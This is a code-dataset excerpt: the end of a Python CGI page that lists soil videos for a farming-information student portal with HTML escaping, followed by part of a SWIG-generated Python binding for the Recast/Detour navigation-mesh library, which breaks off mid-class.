<a href="student_soil_view.py?id=%s" data-toggle="collapse" data-target="#submenu-2" id="font_dash"><i class="fa fa-fw fa-star"></i>Soil Information<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_crop_view.py?id=%s" data-toggle="collapse" data-target="#submenu-3" id="font_dash"><i class="fa fa-fw fa-star"></i>Crop information<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_govtschm_view.py?id=%s" data-toggle="collapse" data-target="#submenu-3" id="font_dash"><i class="fa fa-fw fa-star"></i>Government Schemes<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_query_req.py?id=%s" data-toggle="collapse" data-target="#submenu-4" id="font_dash"><i class="fa fa-fw fa-star"></i>Queries<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
</ul>
</div>
</div>
</div>
<!-- Page content -->
<div style="margin-left:260px;margin-top:100px;">
<div id="page-wrapper">
<div class="container-fluid">
<div class="row" id="main">
<div class="col-sm-12 col-md-12 well">""" %(pid,pid,pid,pid,pid))
# Render every uploaded soil video (description + player) as a table row.
# The query itself is static, so there is no SQL-injection risk here, but the
# row values come from user uploads stored in the database; they are now
# HTML-escaped before interpolation to prevent stored XSS.
import html
sql = """select * from soil_vdo"""
cur.execute(sql)
rows = cur.fetchall()
print("""<table><tr><th>File Description</th><th>File</th></tr>""")
for row in rows:
    # Column layout (from inserts elsewhere): row[1] = stored file name,
    # row[2] = human-readable description.
    filename = "files/" + row[1]
    print("""<tr><td>%s</td><td><video width="200" height="200" controls>
<source src='%s' type="video/mp4">
</video></td></tr>""" % (html.escape(row[2]), html.escape(filename)))
print("""</table>""")
print("""
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
""")
| 37.840278 | 276 | 0.580841 |
e69a723627dfa11626dee3249c847ba20487b06d | 99,914 | py | Python | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 25 | 2015-01-19T20:09:31.000Z | 2022-03-04T12:49:05.000Z | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 2 | 2016-01-16T00:00:24.000Z | 2019-08-17T03:38:11.000Z | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 15 | 2015-10-22T18:18:00.000Z | 2020-07-01T08:17:21.000Z | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.6
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
    # Python >= 2.6: look for the compiled _pyrecast extension next to this
    # file first; fall back to a plain import when imp.find_module fails.
    def swig_import_helper():
        from os.path import dirname
        import imp  # NOTE(review): 'imp' is deprecated/removed in modern Python 3
        fp = None
        try:
            fp, pathname, description = imp.find_module('_pyrecast', [dirname(__file__)])
        except ImportError:
            import _pyrecast
            return _pyrecast
        if fp is not None:
            try:
                _mod = imp.load_module('_pyrecast', fp, pathname, description)
            finally:
                fp.close()
            return _mod
    _pyrecast = swig_import_helper()
    del swig_import_helper
else:
    import _pyrecast
del version_info
# Keep a reference to the 'property' builtin when it exists (Python >= 2.2).
try:
    _swig_property = property
except NameError:
    pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
    """Dynamic (non-static) attribute setter installed as __setattr__ on proxies."""
    return _swig_setattr_nondynamic(self, class_type, name, value, static=0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# Old-/new-style class shim: interpreters that define `object` get new-style
# proxy classes (_newclass=1, which enables the _swig_property descriptors
# installed below); ancient interpreters fall back to a dummy old-style base.
try:
    _object = object
    _newclass = 1
except AttributeError:
    class _object : pass
    _newclass = 0
# ---------------------------------------------------------------------------
# Flat Detour (dt*) function wrappers and constants.
# SWIG emits each wrapper twice on purpose: a Python def (an introspection
# stub) that is immediately shadowed by rebinding the name to the C function
# in _pyrecast, so calls go straight to the extension module.
# ---------------------------------------------------------------------------
def dtStatusSucceed(*args):
    return _pyrecast.dtStatusSucceed(*args)
dtStatusSucceed = _pyrecast.dtStatusSucceed
def dtStatusFailed(*args):
    return _pyrecast.dtStatusFailed(*args)
dtStatusFailed = _pyrecast.dtStatusFailed
def dtStatusInProgress(*args):
    return _pyrecast.dtStatusInProgress(*args)
dtStatusInProgress = _pyrecast.dtStatusInProgress
def dtStatusDetail(*args):
    return _pyrecast.dtStatusDetail(*args)
dtStatusDetail = _pyrecast.dtStatusDetail
# Allocation lifetime hints mirrored from the C enum.
DT_ALLOC_PERM = _pyrecast.DT_ALLOC_PERM
DT_ALLOC_TEMP = _pyrecast.DT_ALLOC_TEMP
def dtAllocSetCustom(*args):
    return _pyrecast.dtAllocSetCustom(*args)
dtAllocSetCustom = _pyrecast.dtAllocSetCustom
def dtAlloc(*args):
    return _pyrecast.dtAlloc(*args)
dtAlloc = _pyrecast.dtAlloc
def dtFree(*args):
    return _pyrecast.dtFree(*args)
dtFree = _pyrecast.dtFree
# Vector/geometry helpers (dtV*, dt*2D, ...) wrapped from DetourCommon.
def dtPoint3(*args):
    return _pyrecast.dtPoint3(*args)
dtPoint3 = _pyrecast.dtPoint3
def dtSqrt(*args):
    return _pyrecast.dtSqrt(*args)
dtSqrt = _pyrecast.dtSqrt
def dtVcross(*args):
    return _pyrecast.dtVcross(*args)
dtVcross = _pyrecast.dtVcross
def dtVdot(*args):
    return _pyrecast.dtVdot(*args)
dtVdot = _pyrecast.dtVdot
def dtVmad(*args):
    return _pyrecast.dtVmad(*args)
dtVmad = _pyrecast.dtVmad
def dtVlerp(*args):
    return _pyrecast.dtVlerp(*args)
dtVlerp = _pyrecast.dtVlerp
def dtVadd(*args):
    return _pyrecast.dtVadd(*args)
dtVadd = _pyrecast.dtVadd
def dtVsub(*args):
    return _pyrecast.dtVsub(*args)
dtVsub = _pyrecast.dtVsub
def dtVscale(*args):
    return _pyrecast.dtVscale(*args)
dtVscale = _pyrecast.dtVscale
def dtVmin(*args):
    return _pyrecast.dtVmin(*args)
dtVmin = _pyrecast.dtVmin
def dtVmax(*args):
    return _pyrecast.dtVmax(*args)
dtVmax = _pyrecast.dtVmax
def dtVset(*args):
    return _pyrecast.dtVset(*args)
dtVset = _pyrecast.dtVset
def dtVcopy(*args):
    return _pyrecast.dtVcopy(*args)
dtVcopy = _pyrecast.dtVcopy
def dtVlen(*args):
    return _pyrecast.dtVlen(*args)
dtVlen = _pyrecast.dtVlen
def dtVlenSqr(*args):
    return _pyrecast.dtVlenSqr(*args)
dtVlenSqr = _pyrecast.dtVlenSqr
def dtVdist(*args):
    return _pyrecast.dtVdist(*args)
dtVdist = _pyrecast.dtVdist
def dtVdistSqr(*args):
    return _pyrecast.dtVdistSqr(*args)
dtVdistSqr = _pyrecast.dtVdistSqr
def dtVdist2D(*args):
    return _pyrecast.dtVdist2D(*args)
dtVdist2D = _pyrecast.dtVdist2D
def dtVdist2DSqr(*args):
    return _pyrecast.dtVdist2DSqr(*args)
dtVdist2DSqr = _pyrecast.dtVdist2DSqr
def dtVnormalize(*args):
    return _pyrecast.dtVnormalize(*args)
dtVnormalize = _pyrecast.dtVnormalize
def dtVequal(*args):
    return _pyrecast.dtVequal(*args)
dtVequal = _pyrecast.dtVequal
def dtVdot2D(*args):
    return _pyrecast.dtVdot2D(*args)
dtVdot2D = _pyrecast.dtVdot2D
def dtVperp2D(*args):
    return _pyrecast.dtVperp2D(*args)
dtVperp2D = _pyrecast.dtVperp2D
def dtTriArea2D(*args):
    return _pyrecast.dtTriArea2D(*args)
dtTriArea2D = _pyrecast.dtTriArea2D
def dtOverlapQuantBounds(*args):
    return _pyrecast.dtOverlapQuantBounds(*args)
dtOverlapQuantBounds = _pyrecast.dtOverlapQuantBounds
def dtOverlapBounds(*args):
    return _pyrecast.dtOverlapBounds(*args)
dtOverlapBounds = _pyrecast.dtOverlapBounds
def dtClosestPtPointTriangle(*args):
    return _pyrecast.dtClosestPtPointTriangle(*args)
dtClosestPtPointTriangle = _pyrecast.dtClosestPtPointTriangle
def dtClosestHeightPointTriangle(*args):
    return _pyrecast.dtClosestHeightPointTriangle(*args)
dtClosestHeightPointTriangle = _pyrecast.dtClosestHeightPointTriangle
def dtIntersectSegmentPoly2D(*args):
    return _pyrecast.dtIntersectSegmentPoly2D(*args)
dtIntersectSegmentPoly2D = _pyrecast.dtIntersectSegmentPoly2D
def dtIntersectSegSeg2D(*args):
    return _pyrecast.dtIntersectSegSeg2D(*args)
dtIntersectSegSeg2D = _pyrecast.dtIntersectSegSeg2D
def dtPointInPolygon(*args):
    return _pyrecast.dtPointInPolygon(*args)
dtPointInPolygon = _pyrecast.dtPointInPolygon
def dtDistancePtPolyEdgesSqr(*args):
    return _pyrecast.dtDistancePtPolyEdgesSqr(*args)
dtDistancePtPolyEdgesSqr = _pyrecast.dtDistancePtPolyEdgesSqr
def dtDistancePtSegSqr2D(*args):
    return _pyrecast.dtDistancePtSegSqr2D(*args)
dtDistancePtSegSqr2D = _pyrecast.dtDistancePtSegSqr2D
def dtCalcPolyCenter(*args):
    return _pyrecast.dtCalcPolyCenter(*args)
dtCalcPolyCenter = _pyrecast.dtCalcPolyCenter
def dtOverlapPolyPoly2D(*args):
    return _pyrecast.dtOverlapPolyPoly2D(*args)
dtOverlapPolyPoly2D = _pyrecast.dtOverlapPolyPoly2D
# Bit/byte utilities.
def dtNextPow2(*args):
    return _pyrecast.dtNextPow2(*args)
dtNextPow2 = _pyrecast.dtNextPow2
def dtIlog2(*args):
    return _pyrecast.dtIlog2(*args)
dtIlog2 = _pyrecast.dtIlog2
def dtAlign4(*args):
    return _pyrecast.dtAlign4(*args)
dtAlign4 = _pyrecast.dtAlign4
def dtOppositeTile(*args):
    return _pyrecast.dtOppositeTile(*args)
dtOppositeTile = _pyrecast.dtOppositeTile
def dtSwapByte(*args):
    return _pyrecast.dtSwapByte(*args)
dtSwapByte = _pyrecast.dtSwapByte
def dtSwapEndian(*args):
    return _pyrecast.dtSwapEndian(*args)
dtSwapEndian = _pyrecast.dtSwapEndian
def dtRandomPointInConvexPoly(*args):
    return _pyrecast.dtRandomPointInConvexPoly(*args)
dtRandomPointInConvexPoly = _pyrecast.dtRandomPointInConvexPoly
# Enum values mirrored from the C headers (tile flags, straight-path flags,
# polygon types).
DT_TILE_FREE_DATA = _pyrecast.DT_TILE_FREE_DATA
DT_STRAIGHTPATH_START = _pyrecast.DT_STRAIGHTPATH_START
DT_STRAIGHTPATH_END = _pyrecast.DT_STRAIGHTPATH_END
DT_STRAIGHTPATH_OFFMESH_CONNECTION = _pyrecast.DT_STRAIGHTPATH_OFFMESH_CONNECTION
DT_STRAIGHTPATH_AREA_CROSSINGS = _pyrecast.DT_STRAIGHTPATH_AREA_CROSSINGS
DT_STRAIGHTPATH_ALL_CROSSINGS = _pyrecast.DT_STRAIGHTPATH_ALL_CROSSINGS
DT_POLYTYPE_GROUND = _pyrecast.DT_POLYTYPE_GROUND
DT_POLYTYPE_OFFMESH_CONNECTION = _pyrecast.DT_POLYTYPE_OFFMESH_CONNECTION
class dtPoly(_object):
    """SWIG proxy for the C++ dtPoly struct (fields: firstLink, verts, neis,
    flags, vertCount, areaAndtype; methods set/getArea, set/getType)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtPoly, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtPoly, name)
    __repr__ = _swig_repr
    __swig_setmethods__["firstLink"] = _pyrecast.dtPoly_firstLink_set
    __swig_getmethods__["firstLink"] = _pyrecast.dtPoly_firstLink_get
    if _newclass:firstLink = _swig_property(_pyrecast.dtPoly_firstLink_get, _pyrecast.dtPoly_firstLink_set)
    __swig_setmethods__["verts"] = _pyrecast.dtPoly_verts_set
    __swig_getmethods__["verts"] = _pyrecast.dtPoly_verts_get
    if _newclass:verts = _swig_property(_pyrecast.dtPoly_verts_get, _pyrecast.dtPoly_verts_set)
    __swig_setmethods__["neis"] = _pyrecast.dtPoly_neis_set
    __swig_getmethods__["neis"] = _pyrecast.dtPoly_neis_get
    if _newclass:neis = _swig_property(_pyrecast.dtPoly_neis_get, _pyrecast.dtPoly_neis_set)
    __swig_setmethods__["flags"] = _pyrecast.dtPoly_flags_set
    __swig_getmethods__["flags"] = _pyrecast.dtPoly_flags_get
    if _newclass:flags = _swig_property(_pyrecast.dtPoly_flags_get, _pyrecast.dtPoly_flags_set)
    __swig_setmethods__["vertCount"] = _pyrecast.dtPoly_vertCount_set
    __swig_getmethods__["vertCount"] = _pyrecast.dtPoly_vertCount_get
    if _newclass:vertCount = _swig_property(_pyrecast.dtPoly_vertCount_get, _pyrecast.dtPoly_vertCount_set)
    __swig_setmethods__["areaAndtype"] = _pyrecast.dtPoly_areaAndtype_set
    __swig_getmethods__["areaAndtype"] = _pyrecast.dtPoly_areaAndtype_get
    if _newclass:areaAndtype = _swig_property(_pyrecast.dtPoly_areaAndtype_get, _pyrecast.dtPoly_areaAndtype_set)
    def setArea(self, *args): return _pyrecast.dtPoly_setArea(self, *args)
    def setType(self, *args): return _pyrecast.dtPoly_setType(self, *args)
    def getArea(self): return _pyrecast.dtPoly_getArea(self)
    def getType(self): return _pyrecast.dtPoly_getType(self)
    def __init__(self):
        # Allocate the underlying C struct; bare except is the generated
        # idiom for "first assignment of self.this".
        this = _pyrecast.new_dtPoly()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtPoly
    __del__ = lambda self : None;
dtPoly_swigregister = _pyrecast.dtPoly_swigregister
dtPoly_swigregister(dtPoly)
# Module-level constants exported through the SWIG global-variable bridge.
cvar = _pyrecast.cvar
DT_FAILURE = cvar.DT_FAILURE
DT_SUCCESS = cvar.DT_SUCCESS
DT_IN_PROGRESS = cvar.DT_IN_PROGRESS
DT_STATUS_DETAIL_MASK = cvar.DT_STATUS_DETAIL_MASK
DT_WRONG_MAGIC = cvar.DT_WRONG_MAGIC
DT_WRONG_VERSION = cvar.DT_WRONG_VERSION
DT_OUT_OF_MEMORY = cvar.DT_OUT_OF_MEMORY
DT_INVALID_PARAM = cvar.DT_INVALID_PARAM
DT_BUFFER_TOO_SMALL = cvar.DT_BUFFER_TOO_SMALL
DT_OUT_OF_NODES = cvar.DT_OUT_OF_NODES
DT_PARTIAL_RESULT = cvar.DT_PARTIAL_RESULT
DT_VERTS_PER_POLYGON = cvar.DT_VERTS_PER_POLYGON
DT_NAVMESH_MAGIC = cvar.DT_NAVMESH_MAGIC
DT_NAVMESH_VERSION = cvar.DT_NAVMESH_VERSION
DT_NAVMESH_STATE_MAGIC = cvar.DT_NAVMESH_STATE_MAGIC
DT_NAVMESH_STATE_VERSION = cvar.DT_NAVMESH_STATE_VERSION
DT_EXT_LINK = cvar.DT_EXT_LINK
DT_NULL_LINK = cvar.DT_NULL_LINK
DT_OFFMESH_CON_BIDIR = cvar.DT_OFFMESH_CON_BIDIR
DT_MAX_AREAS = cvar.DT_MAX_AREAS
class dtPolyDetail(_object):
    """SWIG proxy for the C++ dtPolyDetail struct (fields: vertBase, triBase,
    vertCount, triCount)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtPolyDetail, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtPolyDetail, name)
    __repr__ = _swig_repr
    __swig_setmethods__["vertBase"] = _pyrecast.dtPolyDetail_vertBase_set
    __swig_getmethods__["vertBase"] = _pyrecast.dtPolyDetail_vertBase_get
    if _newclass:vertBase = _swig_property(_pyrecast.dtPolyDetail_vertBase_get, _pyrecast.dtPolyDetail_vertBase_set)
    __swig_setmethods__["triBase"] = _pyrecast.dtPolyDetail_triBase_set
    __swig_getmethods__["triBase"] = _pyrecast.dtPolyDetail_triBase_get
    if _newclass:triBase = _swig_property(_pyrecast.dtPolyDetail_triBase_get, _pyrecast.dtPolyDetail_triBase_set)
    __swig_setmethods__["vertCount"] = _pyrecast.dtPolyDetail_vertCount_set
    __swig_getmethods__["vertCount"] = _pyrecast.dtPolyDetail_vertCount_get
    if _newclass:vertCount = _swig_property(_pyrecast.dtPolyDetail_vertCount_get, _pyrecast.dtPolyDetail_vertCount_set)
    __swig_setmethods__["triCount"] = _pyrecast.dtPolyDetail_triCount_set
    __swig_getmethods__["triCount"] = _pyrecast.dtPolyDetail_triCount_get
    if _newclass:triCount = _swig_property(_pyrecast.dtPolyDetail_triCount_get, _pyrecast.dtPolyDetail_triCount_set)
    def __init__(self):
        this = _pyrecast.new_dtPolyDetail()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtPolyDetail
    __del__ = lambda self : None;
dtPolyDetail_swigregister = _pyrecast.dtPolyDetail_swigregister
dtPolyDetail_swigregister(dtPolyDetail)
class dtLink(_object):
    """SWIG proxy for the C++ dtLink struct (fields: ref, next, edge, side,
    bmin, bmax)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtLink, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtLink, name)
    __repr__ = _swig_repr
    __swig_setmethods__["ref"] = _pyrecast.dtLink_ref_set
    __swig_getmethods__["ref"] = _pyrecast.dtLink_ref_get
    if _newclass:ref = _swig_property(_pyrecast.dtLink_ref_get, _pyrecast.dtLink_ref_set)
    __swig_setmethods__["next"] = _pyrecast.dtLink_next_set
    __swig_getmethods__["next"] = _pyrecast.dtLink_next_get
    if _newclass:next = _swig_property(_pyrecast.dtLink_next_get, _pyrecast.dtLink_next_set)
    __swig_setmethods__["edge"] = _pyrecast.dtLink_edge_set
    __swig_getmethods__["edge"] = _pyrecast.dtLink_edge_get
    if _newclass:edge = _swig_property(_pyrecast.dtLink_edge_get, _pyrecast.dtLink_edge_set)
    __swig_setmethods__["side"] = _pyrecast.dtLink_side_set
    __swig_getmethods__["side"] = _pyrecast.dtLink_side_get
    if _newclass:side = _swig_property(_pyrecast.dtLink_side_get, _pyrecast.dtLink_side_set)
    __swig_setmethods__["bmin"] = _pyrecast.dtLink_bmin_set
    __swig_getmethods__["bmin"] = _pyrecast.dtLink_bmin_get
    if _newclass:bmin = _swig_property(_pyrecast.dtLink_bmin_get, _pyrecast.dtLink_bmin_set)
    __swig_setmethods__["bmax"] = _pyrecast.dtLink_bmax_set
    __swig_getmethods__["bmax"] = _pyrecast.dtLink_bmax_get
    if _newclass:bmax = _swig_property(_pyrecast.dtLink_bmax_get, _pyrecast.dtLink_bmax_set)
    def __init__(self):
        this = _pyrecast.new_dtLink()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtLink
    __del__ = lambda self : None;
dtLink_swigregister = _pyrecast.dtLink_swigregister
dtLink_swigregister(dtLink)
class dtBVNode(_object):
    """SWIG proxy for the C++ dtBVNode struct (fields: bmin, bmax, i)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtBVNode, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtBVNode, name)
    __repr__ = _swig_repr
    __swig_setmethods__["bmin"] = _pyrecast.dtBVNode_bmin_set
    __swig_getmethods__["bmin"] = _pyrecast.dtBVNode_bmin_get
    if _newclass:bmin = _swig_property(_pyrecast.dtBVNode_bmin_get, _pyrecast.dtBVNode_bmin_set)
    __swig_setmethods__["bmax"] = _pyrecast.dtBVNode_bmax_set
    __swig_getmethods__["bmax"] = _pyrecast.dtBVNode_bmax_get
    if _newclass:bmax = _swig_property(_pyrecast.dtBVNode_bmax_get, _pyrecast.dtBVNode_bmax_set)
    __swig_setmethods__["i"] = _pyrecast.dtBVNode_i_set
    __swig_getmethods__["i"] = _pyrecast.dtBVNode_i_get
    if _newclass:i = _swig_property(_pyrecast.dtBVNode_i_get, _pyrecast.dtBVNode_i_set)
    def __init__(self):
        this = _pyrecast.new_dtBVNode()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtBVNode
    __del__ = lambda self : None;
dtBVNode_swigregister = _pyrecast.dtBVNode_swigregister
dtBVNode_swigregister(dtBVNode)
class dtOffMeshConnection(_object):
    """SWIG proxy for the C++ dtOffMeshConnection struct (fields: pos, rad,
    poly, flags, side, userId)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtOffMeshConnection, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtOffMeshConnection, name)
    __repr__ = _swig_repr
    __swig_setmethods__["pos"] = _pyrecast.dtOffMeshConnection_pos_set
    __swig_getmethods__["pos"] = _pyrecast.dtOffMeshConnection_pos_get
    if _newclass:pos = _swig_property(_pyrecast.dtOffMeshConnection_pos_get, _pyrecast.dtOffMeshConnection_pos_set)
    __swig_setmethods__["rad"] = _pyrecast.dtOffMeshConnection_rad_set
    __swig_getmethods__["rad"] = _pyrecast.dtOffMeshConnection_rad_get
    if _newclass:rad = _swig_property(_pyrecast.dtOffMeshConnection_rad_get, _pyrecast.dtOffMeshConnection_rad_set)
    __swig_setmethods__["poly"] = _pyrecast.dtOffMeshConnection_poly_set
    __swig_getmethods__["poly"] = _pyrecast.dtOffMeshConnection_poly_get
    if _newclass:poly = _swig_property(_pyrecast.dtOffMeshConnection_poly_get, _pyrecast.dtOffMeshConnection_poly_set)
    __swig_setmethods__["flags"] = _pyrecast.dtOffMeshConnection_flags_set
    __swig_getmethods__["flags"] = _pyrecast.dtOffMeshConnection_flags_get
    if _newclass:flags = _swig_property(_pyrecast.dtOffMeshConnection_flags_get, _pyrecast.dtOffMeshConnection_flags_set)
    __swig_setmethods__["side"] = _pyrecast.dtOffMeshConnection_side_set
    __swig_getmethods__["side"] = _pyrecast.dtOffMeshConnection_side_get
    if _newclass:side = _swig_property(_pyrecast.dtOffMeshConnection_side_get, _pyrecast.dtOffMeshConnection_side_set)
    __swig_setmethods__["userId"] = _pyrecast.dtOffMeshConnection_userId_set
    __swig_getmethods__["userId"] = _pyrecast.dtOffMeshConnection_userId_get
    if _newclass:userId = _swig_property(_pyrecast.dtOffMeshConnection_userId_get, _pyrecast.dtOffMeshConnection_userId_set)
    def __init__(self):
        this = _pyrecast.new_dtOffMeshConnection()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtOffMeshConnection
    __del__ = lambda self : None;
dtOffMeshConnection_swigregister = _pyrecast.dtOffMeshConnection_swigregister
dtOffMeshConnection_swigregister(dtOffMeshConnection)
class dtMeshHeader(_object):
    """SWIG proxy for the C++ dtMeshHeader struct: per-tile metadata (magic,
    version, tile coordinates, element counts, walkable parameters, bounds,
    BV-tree quantization factor)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtMeshHeader, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtMeshHeader, name)
    __repr__ = _swig_repr
    __swig_setmethods__["magic"] = _pyrecast.dtMeshHeader_magic_set
    __swig_getmethods__["magic"] = _pyrecast.dtMeshHeader_magic_get
    if _newclass:magic = _swig_property(_pyrecast.dtMeshHeader_magic_get, _pyrecast.dtMeshHeader_magic_set)
    __swig_setmethods__["version"] = _pyrecast.dtMeshHeader_version_set
    __swig_getmethods__["version"] = _pyrecast.dtMeshHeader_version_get
    if _newclass:version = _swig_property(_pyrecast.dtMeshHeader_version_get, _pyrecast.dtMeshHeader_version_set)
    __swig_setmethods__["x"] = _pyrecast.dtMeshHeader_x_set
    __swig_getmethods__["x"] = _pyrecast.dtMeshHeader_x_get
    if _newclass:x = _swig_property(_pyrecast.dtMeshHeader_x_get, _pyrecast.dtMeshHeader_x_set)
    __swig_setmethods__["y"] = _pyrecast.dtMeshHeader_y_set
    __swig_getmethods__["y"] = _pyrecast.dtMeshHeader_y_get
    if _newclass:y = _swig_property(_pyrecast.dtMeshHeader_y_get, _pyrecast.dtMeshHeader_y_set)
    __swig_setmethods__["layer"] = _pyrecast.dtMeshHeader_layer_set
    __swig_getmethods__["layer"] = _pyrecast.dtMeshHeader_layer_get
    if _newclass:layer = _swig_property(_pyrecast.dtMeshHeader_layer_get, _pyrecast.dtMeshHeader_layer_set)
    __swig_setmethods__["userId"] = _pyrecast.dtMeshHeader_userId_set
    __swig_getmethods__["userId"] = _pyrecast.dtMeshHeader_userId_get
    if _newclass:userId = _swig_property(_pyrecast.dtMeshHeader_userId_get, _pyrecast.dtMeshHeader_userId_set)
    __swig_setmethods__["polyCount"] = _pyrecast.dtMeshHeader_polyCount_set
    __swig_getmethods__["polyCount"] = _pyrecast.dtMeshHeader_polyCount_get
    if _newclass:polyCount = _swig_property(_pyrecast.dtMeshHeader_polyCount_get, _pyrecast.dtMeshHeader_polyCount_set)
    __swig_setmethods__["vertCount"] = _pyrecast.dtMeshHeader_vertCount_set
    __swig_getmethods__["vertCount"] = _pyrecast.dtMeshHeader_vertCount_get
    if _newclass:vertCount = _swig_property(_pyrecast.dtMeshHeader_vertCount_get, _pyrecast.dtMeshHeader_vertCount_set)
    __swig_setmethods__["maxLinkCount"] = _pyrecast.dtMeshHeader_maxLinkCount_set
    __swig_getmethods__["maxLinkCount"] = _pyrecast.dtMeshHeader_maxLinkCount_get
    if _newclass:maxLinkCount = _swig_property(_pyrecast.dtMeshHeader_maxLinkCount_get, _pyrecast.dtMeshHeader_maxLinkCount_set)
    __swig_setmethods__["detailMeshCount"] = _pyrecast.dtMeshHeader_detailMeshCount_set
    __swig_getmethods__["detailMeshCount"] = _pyrecast.dtMeshHeader_detailMeshCount_get
    if _newclass:detailMeshCount = _swig_property(_pyrecast.dtMeshHeader_detailMeshCount_get, _pyrecast.dtMeshHeader_detailMeshCount_set)
    __swig_setmethods__["detailVertCount"] = _pyrecast.dtMeshHeader_detailVertCount_set
    __swig_getmethods__["detailVertCount"] = _pyrecast.dtMeshHeader_detailVertCount_get
    if _newclass:detailVertCount = _swig_property(_pyrecast.dtMeshHeader_detailVertCount_get, _pyrecast.dtMeshHeader_detailVertCount_set)
    __swig_setmethods__["detailTriCount"] = _pyrecast.dtMeshHeader_detailTriCount_set
    __swig_getmethods__["detailTriCount"] = _pyrecast.dtMeshHeader_detailTriCount_get
    if _newclass:detailTriCount = _swig_property(_pyrecast.dtMeshHeader_detailTriCount_get, _pyrecast.dtMeshHeader_detailTriCount_set)
    __swig_setmethods__["bvNodeCount"] = _pyrecast.dtMeshHeader_bvNodeCount_set
    __swig_getmethods__["bvNodeCount"] = _pyrecast.dtMeshHeader_bvNodeCount_get
    if _newclass:bvNodeCount = _swig_property(_pyrecast.dtMeshHeader_bvNodeCount_get, _pyrecast.dtMeshHeader_bvNodeCount_set)
    __swig_setmethods__["offMeshConCount"] = _pyrecast.dtMeshHeader_offMeshConCount_set
    __swig_getmethods__["offMeshConCount"] = _pyrecast.dtMeshHeader_offMeshConCount_get
    if _newclass:offMeshConCount = _swig_property(_pyrecast.dtMeshHeader_offMeshConCount_get, _pyrecast.dtMeshHeader_offMeshConCount_set)
    __swig_setmethods__["offMeshBase"] = _pyrecast.dtMeshHeader_offMeshBase_set
    __swig_getmethods__["offMeshBase"] = _pyrecast.dtMeshHeader_offMeshBase_get
    if _newclass:offMeshBase = _swig_property(_pyrecast.dtMeshHeader_offMeshBase_get, _pyrecast.dtMeshHeader_offMeshBase_set)
    __swig_setmethods__["walkableHeight"] = _pyrecast.dtMeshHeader_walkableHeight_set
    __swig_getmethods__["walkableHeight"] = _pyrecast.dtMeshHeader_walkableHeight_get
    if _newclass:walkableHeight = _swig_property(_pyrecast.dtMeshHeader_walkableHeight_get, _pyrecast.dtMeshHeader_walkableHeight_set)
    __swig_setmethods__["walkableRadius"] = _pyrecast.dtMeshHeader_walkableRadius_set
    __swig_getmethods__["walkableRadius"] = _pyrecast.dtMeshHeader_walkableRadius_get
    if _newclass:walkableRadius = _swig_property(_pyrecast.dtMeshHeader_walkableRadius_get, _pyrecast.dtMeshHeader_walkableRadius_set)
    __swig_setmethods__["walkableClimb"] = _pyrecast.dtMeshHeader_walkableClimb_set
    __swig_getmethods__["walkableClimb"] = _pyrecast.dtMeshHeader_walkableClimb_get
    if _newclass:walkableClimb = _swig_property(_pyrecast.dtMeshHeader_walkableClimb_get, _pyrecast.dtMeshHeader_walkableClimb_set)
    __swig_setmethods__["bmin"] = _pyrecast.dtMeshHeader_bmin_set
    __swig_getmethods__["bmin"] = _pyrecast.dtMeshHeader_bmin_get
    if _newclass:bmin = _swig_property(_pyrecast.dtMeshHeader_bmin_get, _pyrecast.dtMeshHeader_bmin_set)
    __swig_setmethods__["bmax"] = _pyrecast.dtMeshHeader_bmax_set
    __swig_getmethods__["bmax"] = _pyrecast.dtMeshHeader_bmax_get
